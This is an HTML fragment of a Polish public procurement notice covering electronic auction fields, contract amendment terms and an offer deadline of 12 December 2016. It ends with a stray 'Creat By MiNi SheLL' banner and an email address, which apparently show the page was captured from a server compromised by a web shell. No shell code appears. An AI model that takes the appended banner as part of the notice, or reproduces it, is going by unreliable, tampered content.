              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza możliwość dokonania w umowie zmian w niej przewidzianych. Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na warunkach określonych we wzorze umowy  załącznik nr 7.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/12/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com